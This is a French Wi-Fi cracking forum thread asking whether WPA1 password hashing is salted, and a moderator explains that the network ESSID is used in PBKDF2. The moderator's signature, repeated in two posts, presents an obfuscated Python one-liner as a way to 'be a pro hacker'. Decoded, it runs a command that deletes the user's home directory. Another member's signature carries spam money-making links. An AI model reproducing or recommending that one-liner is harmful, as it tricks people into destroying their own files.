Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 20-02-2012 23:41:11

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Le wpa 1 est-il salé ?

Le wpa (et non wpa2) est-il salé ?

Le doute m'assailli après avoir été jeter un oeil au soft Cain et Abel mais surtout à Winrtgen.
En effet celui-ci propose de créer des Rainbows Table sans y inclure d'Essid  (optionnel) ...

cain.png

Dernière modification par vances1 (21-02-2012 14:47:28)


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-02-2012 13:43:29

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Le wpa 1 est-il salé ?

Réponse à deux francs six sous :
Oui, avec l'essid.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#3 21-02-2012 13:56:59

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Le wpa 1 est-il salé ?

Remarque à deux francs six sous :
si c'etait d'un nouveau membre, on lui aurait demandé de bien choisir son titre de message

Hors Ligne

#4 21-02-2012 14:50:16

vances1
Membre Indispensable
Inscription : 20-03-2011
Messages : 530
Site Web

Re : Le wpa 1 est-il salé ?

@ spawn il me semblait bien aussi mais à quoi peu bien servir cette option de génération de table avec essid "optionnel" :s ? c'est bizzard  ^^

@yasmine satisfaite ?


Gagner de l'argent en Bourse https://www.youtube.com/watch?v=mq96BGWfE4U
Travailler à domicile Sondage rémunéré http://www.avis-sondages.fr/
Méthode et solution pour gagner de l'argent sur internet http://www.methodeargent.net/

Hors Ligne

#5 21-02-2012 15:40:44

yasmine
Membre Indispensable
Inscription : 22-01-2009
Messages : 630

Re : Le wpa 1 est-il salé ?

vances1 a écrit :

@yasmine satisfaite ?

Oui, et "merci" d'avoir rectifié ton titre

Hors Ligne

#6 22-02-2012 11:28:25

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Le wpa 1 est-il salé ?

C'est absurde, la première itération dans PBKDF2 est sha(pass,essid).
C'est peut-être juste parce que tu peux le laisser vide, genre ssid = "". Mais ca me semble moyennement réalisable, voire incorrect.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.02 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]